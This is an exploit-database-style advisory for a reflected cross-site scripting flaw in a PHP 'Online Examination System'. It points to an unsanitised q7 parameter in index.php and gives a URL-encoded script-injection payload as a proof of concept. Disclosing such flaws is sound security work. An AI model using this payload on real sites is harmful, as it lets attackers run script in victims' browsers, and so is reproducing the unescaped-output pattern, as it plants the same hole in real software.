# Exploit Title: Online Examination System - Cross site scripting Reflected # Google Dork: N/A # Date: 2022-9-29 # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11 # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/ # Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip # Tested on: windows 11 - XAMPP # CVE : N/A # Version: 1.0 Vulnerability Details ====================== Steps : vulnerable code in file index.php 157 '.@$_GET['q7'];}?> http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E inject payload parameter q7